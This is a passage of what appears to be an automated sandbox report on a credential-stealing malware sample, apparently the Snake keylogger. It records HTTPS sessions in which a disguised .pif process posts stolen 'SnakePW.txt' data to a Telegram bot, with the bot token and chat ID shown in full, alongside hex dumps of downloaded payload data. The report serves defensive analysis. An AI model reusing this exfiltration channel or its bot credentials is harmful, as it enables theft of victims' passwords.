                                                                                                                      2024-12-18 15:16:44 UTC16384INData Raw: 45 6d 4f 68 45 65 36 49 46 77 66 73 78 56 45 57 35 64 6d 4d 74 6e 6e 79 50 35 53 2f 53 44 74 5a 36 79 6c 69 52 4f 7a 59 39 70 47 63 4b 75 56 59 31 58 42 35 61 54 69 58 33 71 36 67 71 34 36 52 4e 53 6e 74 55 42 51 6d 70 73 72 51 59 50 64 46 67 42 33 72 59 7a 59 77 6a 39 55 37 72 59 2b 38 44 48 46 61 45 2b 77 58 4e 59 41 61 52 6e 68 6e 59 49 36 47 69 55 42 6d 66 35 43 4b 6b 46 50 77 7a 54 49 59 41 6a 57 46 54 76 77 4b 58 31 38 69 7a 61 2b 33 43 71 4d 2b 64 30 58 32 4a 35 62 76 61 56 73 54 7a 5a 4f 38 6f 35 49 70 55 50 32 43 50 6e 7a 36 55 2b 4f 49 33 52 4f 6d 55 43 6f 30 6f 54 56 37 53 44 6e 69 4a 61 71 4e 31 73 56 61 49 38 2f 63 34 6d 67 79 77 57 73 48 59 34 54 50 32 6d 54 6e 78 53 67 44 72 79 77 73 34 6c 38 73 4c 78 6e 5a 32 38 30 2b 2b 38 2f 42 5a 76 57
                                                                                                                      Data Ascii: EmOhEe6IFwfsxVEW5dmMtnnyP5S/SDtZ6yliROzY9pGcKuVY1XB5aTiX3q6gq46RNSntUBQmpsrQYPdFgB3rYzYwj9U7rY+8DHFaE+wXNYAaRnhnYI6GiUBmf5CKkFPwzTIYAjWFTvwKX18iza+3CqM+d0X2J5bvaVsTzZO8o5IpUP2CPnz6U+OI3ROmUCo0oTV7SDniJaqN1sVaI8/c4mgywWsHY4TP2mTnxSgDryws4l8sLxnZ280++8/BZvW
                                                                                                                      2024-12-18 15:16:44 UTC1024INData Raw: 48 39 47 4b 6b 78 7a 78 35 49 43 64 47 55 78 37 68 35 31 39 46 66 78 58 63 42 46 32 37 2b 76 70 61 6c 47 31 67 4e 49 7a 4f 39 72 64 64 6a 37 36 4b 6b 34 6a 4f 33 67 55 6a 33 53 4b 66 49 69 54 55 66 68 54 49 6c 63 2b 47 4b 74 59 72 48 42 4c 42 70 4c 67 71 67 72 48 75 6a 59 50 7a 37 37 4e 49 42 76 50 56 4d 59 67 37 6f 77 77 59 46 6e 77 68 64 45 45 6c 4f 74 2f 68 76 4f 79 64 44 4d 57 30 31 74 2b 41 39 52 30 45 61 4b 77 54 72 4e 43 72 64 6c 64 77 5a 2b 59 53 2f 2b 61 76 64 6d 46 7a 72 43 38 57 4d 61 71 67 31 73 32 51 79 74 37 4d 31 47 6c 6a 34 53 61 6d 4d 65 55 78 63 5a 47 39 31 6c 66 2f 58 61 70 36 4f 48 68 42 75 50 68 77 47 47 73 47 64 7a 4c 51 50 6e 6c 69 57 31 41 37 78 6c 73 54 4b 78 4c 58 4e 64 49 6e 6e 57 56 38 31 49 51 57 6e 70 42 74 74 58 33 79 43 31
                                                                                                                      Data Ascii: H9GKkxzx5ICdGUx7h519FfxXcBF27+vpalG1gNIzO9rddj76Kk4jO3gUj3SKfIiTUfhTIlc+GKtYrHBLBpLgqgrHujYPz77NIBvPVMYg7owwYFnwhdEElOt/hvOydDMW01t+A9R0EaKwTrNCrdldwZ+YS/+avdmFzrC8WMaqg1s2Qyt7M1Glj4SamMeUxcZG91lf/Xap6OHhBuPhwGGsGdzLQPnliW1A7xlsTKxLXNdInnWV81IQWnpBttX3yC1
                                                                                                                      2024-12-18 15:16:44 UTC16384INData Raw: 63 2f 52 59 64 6f 6d 35 4d 77 77 5a 6b 76 51 2b 76 47 53 36 49 48 53 61 47 6e 39 4f 6a 68 67 45 73 78 4e 59 61 73 6b 75 51 76 33 52 38 47 6b 75 76 37 47 37 7a 79 72 38 2f 46 64 30 2f 34 70 44 6d 58 68 4a 64 6c 42 6b 2f 68 6b 51 49 71 30 73 37 70 78 4b 79 68 41 71 68 67 6c 2b 46 78 51 63 57 42 33 38 61 6e 43 63 68 77 6a 50 45 71 6f 66 38 6f 7a 33 6e 63 57 6d 2b 68 6f 75 75 37 63 61 6f 4b 38 6d 42 59 72 4a 6b 6e 71 52 75 7a 31 55 69 77 43 35 54 4d 39 76 2b 4b 76 59 6a 54 75 69 61 77 2b 45 51 78 47 4f 73 50 54 47 33 49 58 5a 31 74 64 35 49 46 42 50 4e 33 6a 49 57 35 4f 34 74 35 46 53 45 48 68 39 58 78 75 72 59 7a 75 79 31 74 6d 2b 55 4f 44 6d 4a 41 63 4a 79 44 67 6d 4b 70 36 4c 46 36 73 55 44 50 5a 35 55 71 75 55 75 43 77 48 45 2f 30 30 35 72 6f 68 2b 44 49
                                                                                                                      Data Ascii: c/RYdom5MwwZkvQ+vGS6IHSaGn9OjhgEsxNYaskuQv3R8Gkuv7G7zyr8/Fd0/4pDmXhJdlBk/hkQIq0s7pxKyhAqhgl+FxQcWB38anCchwjPEqof8oz3ncWm+houu7caoK8mBYrJknqRuz1UiwC5TM9v+KvYjTuiaw+EQxGOsPTG3IXZ1td5IFBPN3jIW5O4t5FSEHh9XxurYzuy1tm+UODmJAcJyDgmKp6LF6sUDPZ5UquUuCwHE/005roh+DI
                                                                                                                      2024-12-18 15:16:44 UTC1024INData Raw: 62 36 53 70 4f 2f 51 33 63 79 57 71 4a 68 32 38 6e 33 6b 32 47 48 48 4f 51 32 6e 4f 55 38 47 7a 63 57 37 31 77 69 6d 46 33 77 70 2f 4b 6d 59 72 58 6f 63 56 54 72 43 50 2f 45 73 36 66 2f 2b 30 71 43 43 77 68 41 75 56 6b 54 59 71 34 43 4b 52 55 46 47 6f 37 53 39 4e 43 76 46 51 79 63 43 67 46 63 55 4a 2b 51 76 62 74 31 62 54 73 45 58 68 32 7a 71 7a 6b 4d 31 64 38 42 39 57 76 41 37 4f 34 76 4f 64 79 33 55 74 6c 62 75 62 61 39 52 77 57 37 56 41 6d 4d 46 47 77 4f 56 59 73 6d 66 70 5a 73 4b 45 52 58 63 31 6e 34 53 54 4d 68 4a 37 48 44 41 4a 70 32 6d 6a 58 63 59 78 66 39 58 35 33 53 6c 59 6e 36 38 4a 64 2b 4a 72 53 52 6a 61 30 49 44 5a 39 67 4d 42 4b 31 6b 73 4a 4f 4e 31 6b 4c 32 4e 4f 6f 4d 2b 30 55 59 45 71 6a 51 69 54 4e 67 6f 39 38 45 45 47 6d 71 2f 42 42 65
                                                                                                                      Data Ascii: b6SpO/Q3cyWqJh28n3k2GHHOQ2nOU8GzcW71wimF3wp/KmYrXocVTrCP/Es6f/+0qCCwhAuVkTYq4CKRUFGo7S9NCvFQycCgFcUJ+Qvbt1bTsEXh2zqzkM1d8B9WvA7O4vOdy3Utlbuba9RwW7VAmMFGwOVYsmfpZsKERXc1n4STMhJ7HDAJp2mjXcYxf9X53SlYn68Jd+JrSRja0IDZ9gMBK1ksJON1kL2NOoM+0UYEqjQiTNgo98EEGmq/BBe
                                                                                                                      2024-12-18 15:16:44 UTC1749INData Raw: 41 4c 7a 49 42 33 70 41 69 6d 6e 4d 5a 65 30 6c 52 4d 58 57 4a 2f 75 64 69 39 6e 6a 63 65 52 6a 30 63 35 4a 68 43 66 59 46 68 4f 5a 33 64 78 38 72 2f 76 42 6a 6f 2b 77 4c 48 6d 76 2f 4a 73 64 77 74 2b 72 41 34 68 35 7a 54 57 35 38 62 51 48 51 66 4f 47 59 62 37 36 57 2f 53 55 56 76 43 76 57 33 66 45 64 51 48 4d 2f 6f 66 59 79 31 6e 48 4a 6e 68 4c 4d 75 63 69 49 4b 58 6b 51 37 61 57 2b 48 42 4d 6c 49 31 57 51 68 71 61 6b 32 55 64 78 67 49 56 62 75 59 71 6e 5a 2b 4e 57 57 30 38 4c 6b 2f 72 44 36 39 6a 61 58 71 65 50 76 38 30 6a 36 2f 78 47 79 55 76 34 6c 45 45 35 53 55 6e 4d 56 71 74 71 73 45 53 71 64 70 57 4c 54 68 4c 77 35 79 46 6e 42 59 73 34 65 58 69 77 32 44 56 71 73 4d 6f 75 59 58 62 42 59 69 4a 68 67 76 2f 59 34 63 34 61 59 33 57 71 61 45 37 56 6c 6b
                                                                                                                      Data Ascii: ALzIB3pAimnMZe0lRMXWJ/udi9njceRj0c5JhCfYFhOZ3dx8r/vBjo+wLHmv/Jsdwt+rA4h5zTW58bQHQfOGYb76W/SUVvCvW3fEdQHM/ofYy1nHJnhLMuciIKXkQ7aW+HBMlI1WQhqak2UdxgIVbuYqnZ+NWW08Lk/rD69jaXqePv80j6/xGyUv4lEE5SUnMVqtqsESqdpWLThLw5yFnBYs4eXiw2DVqsMouYXbBYiJhgv/Y4c4aY3WqaE7Vlk
                                                                                                                      2024-12-18 15:16:44 UTC9000INData Raw: 54 71 73 61 4d 39 43 37 4c 58 39 6c 57 62 77 45 38 70 43 4d 38 4f 48 43 57 55 59 49 6e 43 69 37 34 48 32 67 55 44 65 6b 74 6a 4f 4d 65 7a 54 6e 58 71 78 76 57 37 4f 32 5a 68 34 53 72 6c 46 63 6f 53 75 77 56 4e 58 6b 61 56 79 6c 47 4b 38 73 48 6b 30 4a 43 72 47 79 62 57 59 49 4b 73 68 30 79 47 66 61 34 58 7a 43 38 72 7a 65 6a 53 73 31 6c 55 67 38 54 6d 62 70 50 5a 2b 77 55 74 2b 62 4b 78 2f 66 6c 46 79 78 42 48 55 75 46 69 75 44 58 73 6c 4d 67 51 74 35 4b 2b 51 48 46 2b 34 59 70 45 59 55 67 4f 31 4f 57 2f 67 6e 6c 45 2b 61 38 6a 31 6a 50 65 49 77 50 57 52 38 55 70 2f 7a 58 62 79 59 65 52 50 65 77 36 79 64 51 31 6a 68 50 69 6f 74 4a 32 6b 46 42 54 48 37 5a 39 42 2b 4e 31 42 61 37 2f 6f 6b 33 2f 4a 4d 71 70 6e 6f 62 79 2b 31 76 37 43 53 43 66 4c 73 77 32 61
                                                                                                                      Data Ascii: TqsaM9C7LX9lWbwE8pCM8OHCWUYInCi74H2gUDektjOMezTnXqxvW7O2Zh4SrlFcoSuwVNXkaVylGK8sHk0JCrGybWYIKsh0yGfa4XzC8rzejSs1lUg8TmbpPZ+wUt+bKx/flFyxBHUuFiuDXslMgQt5K+QHF+4YpEYUgO1OW/gnlE+a8j1jPeIwPWR8Up/zXbyYeRPew6ydQ1jhPiotJ2kFBTH7Z9B+N1Ba7/ok3/JMqpnoby+1v7CSCfLsw2a
                                                                                                                      2024-12-18 15:16:44 UTC16384INData Raw: 4c 37 32 76 56 71 61 68 41 6f 35 44 75 64 79 70 32 51 4e 31 35 77 6e 75 6f 30 2f 45 56 6d 4a 7a 6a 50 64 57 36 2b 63 69 2b 68 38 6e 5a 2b 33 4a 74 75 55 45 66 4b 4b 2b 7a 6b 37 55 54 49 4e 6d 32 33 53 54 48 35 7a 69 54 4f 70 4f 32 35 6b 6f 38 49 4c 4e 76 57 52 62 6b 6f 54 54 34 6d 35 6b 34 5a 43 4a 4d 71 61 41 56 48 6a 7a 63 4e 59 4b 53 68 57 55 57 6e 5a 41 31 36 33 66 67 49 54 6a 4b 70 67 79 43 6d 54 38 66 50 42 41 59 68 31 66 6a 5a 4b 76 4e 79 4c 69 44 4d 65 43 53 4f 48 37 72 30 62 78 4c 2f 4a 75 2f 57 63 31 37 46 36 53 6c 49 77 65 4a 68 46 31 79 48 4e 34 74 54 56 73 69 6d 55 55 48 53 42 41 77 41 44 61 6c 2b 6f 44 71 56 65 63 35 36 44 4f 33 35 70 79 6c 4a 73 6d 69 59 30 72 61 37 33 44 41 61 49 6c 41 6c 65 31 71 66 76 4b 69 4e 31 6c 77 7a 41 53 68 41 48
                                                                                                                      Data Ascii: L72vVqahAo5Dudyp2QN15wnuo0/EVmJzjPdW6+ci+h8nZ+3JtuUEfKK+zk7UTINm23STH5ziTOpO25ko8ILNvWRbkoTT4m5k4ZCJMqaAVHjzcNYKShWUWnZA163fgITjKpgyCmT8fPBAYh1fjZKvNyLiDMeCSOH7r0bxL/Ju/Wc17F6SlIweJhF1yHN4tTVsimUUHSBAwADal+oDqVec56DO35pylJsmiY0ra73DAaIlAle1qfvKiN1lwzAShAH
                                                                                                                      2024-12-18 15:16:44 UTC1024INData Raw: 71 61 68 71 61 73 79 63 55 42 30 4e 34 4b 63 50 6b 79 52 4f 53 51 4b 79 46 2b 41 33 32 62 46 72 45 6c 6b 59 63 39 46 6a 4e 44 71 45 6b 38 6b 6c 67 37 66 35 6d 63 6c 75 78 72 73 4e 67 32 74 69 77 58 77 76 78 2f 7a 7a 44 6a 33 6c 6d 76 61 4f 63 6c 4c 65 46 68 4d 58 4b 75 66 4d 58 35 75 6a 2f 78 2f 30 44 63 56 72 38 69 45 79 50 79 79 44 53 79 44 61 4a 53 5a 6b 53 44 79 47 78 36 58 51 76 62 6c 66 6b 4e 6d 75 41 63 48 4b 30 58 58 53 71 37 57 6b 75 36 7a 6a 41 39 2b 64 54 45 6b 30 31 63 61 46 77 70 76 61 79 47 62 75 55 44 41 76 54 6a 6a 50 66 77 61 71 46 51 46 44 51 50 45 4e 4f 7a 61 65 68 4b 6b 53 36 64 48 78 4c 79 58 75 2b 64 56 4e 56 55 35 5a 47 43 6f 4a 48 30 67 79 50 45 6f 35 66 2f 4f 37 4f 55 2b 46 37 52 71 42 64 75 43 65 39 43 30 36 31 57 64 67 4c 55 51
                                                                                                                      Data Ascii: qahqasycUB0N4KcPkyROSQKyF+A32bFrElkYc9FjNDqEk8klg7f5mcluxrsNg2tiwXwvx/zzDj3lmvaOclLeFhMXKufMX5uj/x/0DcVr8iEyPyyDSyDaJSZkSDyGx6XQvblfkNmuAcHK0XXSq7Wku6zjA9+dTEk01caFwpvayGbuUDAvTjjPfwaqFQFDQPENOzaehKkS6dHxLyXu+dVNVU5ZGCoJH0gyPEo5f/O7OU+F7RqBduCe9C061WdgLUQ


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.549758149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:02 UTC352OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd1f4d1c06ddc3
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-12-18 15:17:02 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 34 64 31 63 30 36 64 64 63 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd1f4d1c06ddc3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:17:03 UTC370INHTTP/1.1 429 Too Many Requests
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:03 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 111
                                                                                                                      Connection: close
                                                                                                                      Retry-After: 10
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:03 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 30 7d 7d
                                                                                                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 10","parameters":{"retry_after":10}}


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.549782149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:11 UTC352OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd1f4d2162bfeb
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-12-18 15:17:11 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 34 64 32 31 36 32 62 66 65 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd1f4d2162bfebContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:17:16 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:16 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:16 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 36 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 33 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418638,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535036,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.549790149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:14 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd1f4d27f0447e
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:17:14 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 34 64 32 37 66 30 34 34 37 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd1f4d27f0447eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:17:16 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:16 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:17:16 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 36 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 30 33 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418640,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535036,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.549799149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:17:17 UTC352OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd1f4d24e5b12f
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2024-12-18 15:17:17 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 34 64 32 34 65 35 62 31 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd1f4d24e5b12fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:17:21 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:20 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
